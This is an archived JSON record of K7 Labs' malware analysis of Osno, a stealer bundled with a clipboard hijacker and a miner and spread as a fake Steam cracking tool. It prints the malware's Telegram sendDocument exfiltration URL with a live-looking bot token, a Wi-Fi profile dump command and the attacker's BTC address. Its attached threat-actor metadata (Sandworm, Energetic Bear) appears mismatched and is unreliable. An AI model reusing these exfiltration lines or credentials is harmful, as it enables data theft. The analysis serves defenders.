{ "id": "ecc84c12-7348-4ead-9195-f47ec0324837", "created_at": "2026-04-06T00:21:05.62599Z", "updated_at": "2026-04-10T13:12:45.785755Z", "deleted_at": null, "sha1_hash": "73731d6c0880b4139b2396c125e9a1607a1f2e36", "title": "Osno – A Stealer and a Miner in One", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 566108, "plain_text": "Osno – A Stealer and a Miner in One\r\nPublished: 2021-01-28 · Archived: 2026-04-05 14:53:38 UTC\r\nIn the earlier days, threat actors used to create malware for a specific job. For instance, ransomware. However,\r\nthese days threat actors have started creating malware which are versatile. Here, in this blog we will be explaining\r\nabout one such malware, Osno, which is both a Stealer and a Miner. \r\nOsno Recovery Tool/Stealer steals browser data, wallet details, captures screenshot of system and grabs details of\r\ninstalled programs. Earlier this year, Osno stealer when downloaded installed both a rootkit and its ransomware on\r\nthe victim’s system. Here, we will be getting into the nuances of an archive file “Steam_Machine_Checker.rar”\r\nwhich can be downloaded from the site\r\nhxxps[:]//www[.]upload[.]ee/files/12701875/Steam_Machine_Checker[.]rar[.]html and comes bundled with Osno\r\nstealer, BTC Clipboard Hijacker along with a Coinminer.\r\nFigure 1: Malware Download\r\nSteam is a digital store for purchasing, downloading and playing video games. “Steam Machine Brute Force\r\nChecker” is a hacktool for brute forcing passwords for Steam Engine. The author tries to lure  illegal game users\r\ninto downloading this tool bundled with malware.\r\nAfter execution of the Steam_Machine_Checker.exe, it opens the GUI screen of “Steam Machine Brute Force\r\nchecker” in the frontend and starts its malicious activity in the backend. \r\nhttps://labs.k7computing.com/?p=21562\r\nPage 1 of 10\n\nFigure 2: SteamBruteForce\u0026Checker GUI\r\nFigure 3: Process Flow\r\nSteamMachine.exe executes service.exe and then SteamMachineService.exe which are not malicious by\r\nthemselves. \r\nhttps://labs.k7computing.com/?p=21562\r\nPage 2 of 10\n\nFigure 4: Files found in SteamMachine/config Folder\r\nPersistence\r\nUpdate.exe creates Run entry for persistence in the “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run”\r\nregistry location and points to the file in  “%AppData%\\Roaming\\scvhost\\scvhostservice.exe“. Scvhostservice.exe\r\ninitiates svchost.exe which in turn does coin mining. \r\nFigure 5: Autostart Entry for Malware\r\nClipboard Hijacker\r\nCtfmom.exe and _CL_02f3a8c9sy is dropped in “%Appdata%/Roaming/Microsoft” by config.exe. \r\n_CL_02f3a8c9sy has base64 encoded data.\r\nFigure 6: ctfmom.exe – Clipboard Hijacker\r\nIt gets the current Clipboard using Clipboard.GetText( ). If the hash in currentClipboard starts with ‘1’ it replaces\r\nit with 1LrPUuoopchKbfkJYLEwk2YWqBh6ZakTxX using Clipboard.SetText( ). \r\nClipboard.GetText – Retrieves text data from the Clipboard.\r\nClipboard.SetText – Clears the Clipboard and then adds text data to it.\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 3 of 10\n\nA common user may not notice any change while pasting for a BTC transaction. Hackers will succeed in getting\r\nbitcoins using such transactions (wrong transaction for the user).\r\nFigure 7: Code containing Clipboard Hijacker\r\nFigure 8: Code containing Malware Author’s BTC Address\r\nThis transaction ID has been actively receiving Bitcoins by abusing clipboard. Some users have reported the\r\nreplacement of their hash with the malware author’s hash in the same site.\r\nFigure 9: Bitcoin Transaction for 1LrPUuoopchKbfkJYLEwk2YWqBh6ZakTxX\r\nOsno Stealer\r\nConfigs.exe starts MsBuild.exe for stealer activity. MSBuild.exe steals bookmarks (for finding victim’s preferred\r\nsite which could be internet banking or bitcoin transaction site), wallets, list of running process (using\r\ntasklist.exe), hardware and software installed – Anti-Virus, firewall etc., which is kept in the temp folder with\r\nMD5 (username)/MD5 (machinename).\r\n‘\"cmd.exe\" /C chcp 65001 \u0026\u0026 netsh wlan show profile | findstr All’\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 4 of 10\n\nis used for viewing Wireless AutoConfig Service profile and converting to UTF-8 format and the list of Bitcoin\r\nwallet searched: Zcash, Armory, Bytecoin, Ethereum, Exodus, Electrum, Coinomi, Guarda, Atomic, Litecoin,\r\nDash, Bitcoin.\r\nIt also downloads CommandCam.exe from\r\nhxxp[:]//raw[.]githubusercontent[.]com/tedburke/CommandCam/master/CommandCam[.]exe\r\n for capturing screenshots of the system. \r\nThe screenshot is saved as screen.jpg\r\nFigure 10: Stealer Data in Temp Folder\r\nSignature.txt, created by MSBuild.exe, is  found in temp directory has the string “Osno Recovery Tool version\r\n2.1.5”\r\nFigure 11: Contents in Signature.txt\r\nHardware \u0026 Soft.txt created by MSBuild.exe also has the string “OsnoStealer WifiFucker v2” and other details\r\nlike Firewall, Anti-Virus, Timezone, Country, and HWID.\r\nFigure 12: Contents in Hardware \u0026 Soft.txt\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 5 of 10\n\nMSBuild.exe also gets a list of all the stored files present in each directory. It is then stored in the subfolder ‘Dirs’\r\nas Desktop.txt, Documents.txt, Downloads.txt, OneDrive.txt, Pictures.txt, Startup.txt, Temp.txt and Videos.txt.\r\nFigure 13: Stealer data in Directory Structure\r\nIt then sends the stolen data in temp via telegram using ‘sendDocument’ of Telegram Bot API. This method is used\r\nto send general files.\r\nsendDocument\r\nsendDocument (chat_id, document)\r\nUse this method to send general files. On success, the sent message is returned. Bots can currently send files of\r\nany type of up to 50 MB in size, this limit may be changed in the future.\r\nParameter Type Required Description\r\nchat_id\r\nInteger or\r\nString\r\nYes\r\nUnique identifier for the target chat or username of\r\nthe target channel (in the format @channelusername)\r\ndocument\r\nInputFile\r\nor String\r\nYes\r\nFile to send. Pass a file_id as String to send a file\r\nthat exists on the Telegram servers (recommended),\r\npass an HTTP URL as a String for Telegram to get a\r\nfile from the Internet, or upload a new one using\r\nmultipart/form-data. More info on Sending Files \r\nBotid: 1357457986:AAERrY18oy4DDObaDW6NeWL5QjSOphXAuyA\r\nChat_id: 1171937559\r\nhxxp[:]//api[.]telegram[.]org/bot1357457986:AAERrY18oy4DDObaDW6NeWL5QjSOphXAuyA/sendDocument?\r\nchat_id=1171937559\u0026amp;caption=☠️ Brought you by Osno 2.1.5 ☠️\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 6 of 10\n\nFigure 14: Malicious Network Activity Captured\r\nMalware process path is stored as base64 encoded in %Temp%/gpustats.bx path.\r\nFigure 15: gpustats.bx found in temp\r\nCoinminer\r\nAlong with the stealer and BTC Clipboard Hijacking, it also does coin mining. The files seen in Figure 16 are\r\ndropped by update.exe which is responsible for coin mining.\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 7 of 10\n\nFigure 16: Coinminer dropped in Roaming\\scvhost\r\nCoinminer programs namely DiabloMiner, found in the Cursor Library files are from open source code. Other\r\nCursor Libraries are derived from poclbm project.\r\nControl Logic Open Source Code Author\r\ndiablo130302.cl   DiabloMiner Con Kolivas, Patrick McFarland\r\ndiakgcn121016.cl poclbm project\r\nphatk kernel Phateus\r\nDiabloMiner kernel DiabloD3\r\nphatk121016.cl poclbm project Con Kolivas\r\npoclbm130302.cl poclbm project Con Kolivas\r\nscrypt130511.cl Con Kolivas\r\nSvchost.exe dropped in AppData\\Roaming\\scvhost does coinminer activity. Svchost.exe is a legitimate coinmining\r\nfile given malicious parameters by the threat actors to do their illegal work.\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 8 of 10\n\nFigure 17: Fake svchost.exe contacting litecoinpool\r\nLitecoin, as shown in Figure 17, is a purportedly technical improvement of Bitcoin that is capable of faster\r\nturnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84\r\nmillion Litecoins—four times as many cryptocurrency units issued by Bitcoin.\r\nmining.subscribe(“user agent/version”, “extranonce1”)\r\nmining.authorize(“username”, “password”)\r\nFigure 18: Coinmining Packet\r\nOsno stealer not only keeps evolving its techniques and code to stay undetected but also comes bundled with\r\ncoinminer and BTC Clipboard Hijacker for malware author’s direct monetary benefit. Users are advised not to\r\ndownload and install hacking tool software from untrusted sites, which might actually be a trap laid out for them.\r\nIt is also recommended to double check the hash while doing a BTC transaction. We at K7 detect all such\r\nmalicious files. Users are advised to install a reputable security product like “K7 Total Security” and keep it\r\nupdated to stay safe from the latest threats.\r\nIndicators Of Compromise (IOCs)\r\nMD5 File Name K7 Detection Name\r\n12CB317972BD329289FBC8B7CD289E67 configs.exe Trojan ( 005756931 )\r\n29516F4747ABB49E2085B64376A89F2E update.exe Trojan ( 005756931 )\r\n998D4888B99734C60802F93FB2DAF940 ctfmom.exe Trojan ( 00558e791 )\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 9 of 10\n\n29516F4747ABB49E2085B64376A89F2E scvhostservice.exe Trojan ( 005756931 )\r\nSource: https://labs.k7computing.com/?p=21562\r\nhttps://labs.k7computing.com/?p=21562\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://labs.k7computing.com/?p=21562" ], "report_names": [ "?p=21562" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434865, "ts_updated_at": 1775826765, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/73731d6c0880b4139b2396c125e9a1607a1f2e36.pdf", "text": "https://archive.orkl.eu/73731d6c0880b4139b2396c125e9a1607a1f2e36.txt", "img": "https://archive.orkl.eu/73731d6c0880b4139b2396c125e9a1607a1f2e36.jpg" } }